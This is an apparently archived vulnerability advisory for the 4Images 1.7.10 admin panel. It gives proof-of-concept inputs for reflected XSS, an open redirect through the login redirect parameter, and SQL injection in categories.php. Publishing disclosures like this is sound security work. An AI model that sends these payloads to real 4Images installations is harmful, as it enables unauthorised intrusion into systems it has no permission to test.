4Images version 1.7.10 suffers from a cross site scripting vulnerability in the administrative panel.
7dd9e0133074644527dd2a56ecee765075f79c519bfc221648d9e2b3e5b1b2f4
################################################################################################
#
# Exploit Title: 4Images Version: 1.7.10 Admin Panel Multiple Vulnerabilities
# Script Page : https://www.4homepages.de
# Date: 31-01-2012
# Author : RandomStorm - https://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Mac (IE9 - Firefox 9.0)
#
################################################################################################
#
# Cross-Site Scripting (XSS)
#
# Vector: 'acc91<script>alert(1)</script>9da1925478
#
# https://4images.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS)
#
################################################################################################
#
# Open Redirect
#
#
# https://4images.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248&action=login&redirect=https://google.com&loginusername=admin&loginpassword=pass
#
# <title>4images - Control Panel</title>
# <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
# <link rel="stylesheet" href="./../admin/cpstyle.css">
# <meta http-equiv="Refresh" content="0; URL=https://google.com">
# <script language="JavaScript">
#
#
################################################################################################
#
# Sql Injection
#
# https://4images.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection)
#
################################################################################################